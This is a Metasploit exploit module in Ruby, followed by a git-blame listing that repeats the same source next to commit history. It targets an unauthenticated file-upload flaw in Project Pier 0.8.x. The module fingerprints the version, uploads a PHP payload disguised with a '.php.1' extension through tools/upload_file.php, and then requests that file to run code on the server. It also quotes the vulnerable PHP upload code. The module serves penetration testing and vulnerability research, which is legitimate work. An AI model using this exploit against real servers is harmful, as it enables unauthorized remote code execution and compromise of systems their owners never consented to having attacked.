modules/exploits/unix/webapp/projectpier_upload_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Project Pier Arbitrary File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in Project Pier.  The application's
        uploading tool does not require any authentication, which allows a malicious user
        to upload an arbitrary file onto the web server, and then cause remote code
        execution by simply requesting it. This module is known to work against Apache
        servers due to the way it handles an extension name, but the vulnerability may
        not be exploitable on others.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'BlackHawk',
          'sinn3r'
        ],
      'References'     =>
        [
          ['OSVDB', '85881'],
          ['EDB', '21929'],
          ['PACKETSTORM', '117070']
        ],
      'Platform'       => %w{ linux php },
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
          [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'DisclosureDate' => "Oct 8 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/pp088/'])
      ])
  end


  def check
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1,1] != '/'
    base = File.dirname("#{uri}.")

    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri'    => normalize_uri("#{base}/index.php"),
        'vars_get' =>
          {
            'c' => 'access',
            'a' => 'login'
          }
      })

    if res and res.body =~ /Welcome to ProjectPier 0\.8\.[0-8]/ and res.headers['Server'] =~ /^Apache/
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def upload_php(base, fname, php_payload, folder_name)
    data = Rex::MIME::Message.new
    data.add_part(folder_name, nil, nil, 'form-data; name="folder"')
    data.add_part(php_payload, nil, nil, "form-data; name=file; filename=\"#{fname}\"")
    data.add_part('', nil, nil, 'form-data; name="part"')
    data.add_part('Submit', nil, nil, 'form-data; name="submit"')

    post_data = data.to_s

    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{base}/tools/upload_file.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    return res.body if res
  end

  def exec_php(base, body)
    # Body example:
    # 0 ./upload/test/test.txt-0001
    uri = body.scan(/(\/.+$)/).flatten[0]

    res = send_request_raw({'uri' => "#{base}/tools#{uri}"})

    if res and res.code == 404
      print_error("The upload most likely failed")
      return
    end

    handler
  end

  def exploit
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1,1] != '/'
    base = File.dirname("#{uri}.")

    # Don't create a directory on the target since it complicates
    # cleaning up after ourselves
    #folder_name = Rex::Text.rand_text_alpha(4)
    folder_name = ""
    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php.1"
    @clean_files = []

    p = get_write_exec_payload(:unlink_self=>true)

    print_status("Uploading PHP payload (#{p.length.to_s} bytes)...")
    res = upload_php(base, php_fname, p, folder_name)

    if not res
      print_error("No response from server")
      return
    end

    print_status("Executing '#{php_fname}'...")
    exec_php(base, res)
  end
end

=begin
Relevant code from tools/upload_file.php

    $folder = rtrim( './upload/' . $_POST['folder'] , '/');
    mkdir($folder, 0777, true);

    $seq = str_pad((int) $_POST["part"],4,"0",STR_PAD_LEFT);
    move_uploaded_file($_FILES["file"]["tmp_name"],
    $folder . '/' . $_FILES["file"]["name"] . '-' . $seq );

Note that it stores the uploaded files in tools/upload/ not upload/

=end
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::PhpEXE`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Project Pier Arbitrary File Upload Vulnerability",`
			`'Description' => %q{`
			`This module exploits a vulnerability found in Project Pier. The application's`
			`uploading tool does not require any authentication, which allows a malicious user`
			`to upload an arbitrary file onto the web server, and then cause remote code`
			`execution by simply requesting it. This module is known to work against Apache`
			`servers due to the way it handles an extension name, but the vulnerability may`
			`not be exploitable on others.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'BlackHawk',`
			`'sinn3r'`
			`],`
			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '85881'],`
Retab modules 2013-08-30 16:28:54 -05:00			`['EDB', '21929'],`
Update msftidy to catch more potential URL vs PACKETSTORM warnings 2015-12-24 09:12:24 -08:00			`['PACKETSTORM', '117070']`
Retab modules 2013-08-30 16:28:54 -05:00			`],`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ linux php },`
Retab modules 2013-08-30 16:28:54 -05:00			`'Targets' =>`
			`[`
			`[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],`
			`[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]`
			`],`
			`'Arch' => ARCH_CMD,`
			`'Privileged' => false,`
			`'DisclosureDate' => "Oct 8 2012",`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, 'The path to the web application', '/pp088/'])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00			`end`


			`def check`
			`uri = normalize_uri(target_uri.path)`
			`uri << '/' if uri[-1,1] != '/'`
			`base = File.dirname("#{uri}.")`

			`res = send_request_cgi(`
			`{`
			`'method' => 'GET',`
			`'uri' => normalize_uri("#{base}/index.php"),`
			`'vars_get' =>`
			`{`
			`'c' => 'access',`
			`'a' => 'login'`
			`}`
			`})`

			`if res and res.body =~ /Welcome to ProjectPier 0\.8\.[0-8]/ and res.headers['Server'] =~ /^Apache/`
Saving progress 2014-01-21 13:03:36 -06:00			`return Exploit::CheckCode::Appears`
Retab modules 2013-08-30 16:28:54 -05:00			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`end`

			`def upload_php(base, fname, php_payload, folder_name)`
			`data = Rex::MIME::Message.new`
			`data.add_part(folder_name, nil, nil, 'form-data; name="folder"')`
			`data.add_part(php_payload, nil, nil, "form-data; name=file; filename=\"#{fname}\"")`
			`data.add_part('', nil, nil, 'form-data; name="part"')`
			`data.add_part('Submit', nil, nil, 'form-data; name="submit"')`

Fix MIME message to_s 2014-02-10 22:23:23 -06:00			`post_data = data.to_s`
Retab modules 2013-08-30 16:28:54 -05:00
			`res = send_request_cgi({`
			`'method' => 'POST',`
			`'uri' => "#{base}/tools/upload_file.php",`
			`'ctype' => "multipart/form-data; boundary=#{data.bound}",`
			`'data' => post_data`
			`})`

			`return res.body if res`
			`end`

			`def exec_php(base, body)`
			`# Body example:`
			`# 0 ./upload/test/test.txt-0001`
			`uri = body.scan(/(\/.+$)/).flatten[0]`

			`res = send_request_raw({'uri' => "#{base}/tools#{uri}"})`

			`if res and res.code == 404`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_error("The upload most likely failed")`
Retab modules 2013-08-30 16:28:54 -05:00			`return`
			`end`

			`handler`
			`end`

			`def exploit`
			`uri = normalize_uri(target_uri.path)`
			`uri << '/' if uri[-1,1] != '/'`
			`base = File.dirname("#{uri}.")`

			`# Don't create a directory on the target since it complicates`
			`# cleaning up after ourselves`
			`#folder_name = Rex::Text.rand_text_alpha(4)`
			`folder_name = ""`
			`php_fname = "#{Rex::Text.rand_text_alpha(5)}.php.1"`
			`@clean_files = []`

			`p = get_write_exec_payload(:unlink_self=>true)`

Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Uploading PHP payload (#{p.length.to_s} bytes)...")`
Retab modules 2013-08-30 16:28:54 -05:00			`res = upload_php(base, php_fname, p, folder_name)`

			`if not res`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_error("No response from server")`
Retab modules 2013-08-30 16:28:54 -05:00			`return`
			`end`

Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Executing '#{php_fname}'...")`
Retab modules 2013-08-30 16:28:54 -05:00			`exec_php(base, res)`
			`end`
Add Project Pier File Upload Vulnerability 2012-10-11 13:47:40 -05:00			`end`
Add a mixin for uploading/executing bins with PHP 2012-10-12 02:57:41 -05:00
			`=begin`
			`Relevant code from tools/upload_file.php`

			`$folder = rtrim( './upload/' . $_POST['folder'] , '/');`
			`mkdir($folder, 0777, true);`

			`$seq = str_pad((int) $_POST["part"],4,"0",STR_PAD_LEFT);`
			`move_uploaded_file($_FILES["file"]["tmp_name"],`
			`$folder . '/' . $_FILES["file"]["name"] . '-' . $seq );`

			`Note that it stores the uploaded files in tools/upload/ not upload/`

			`=end`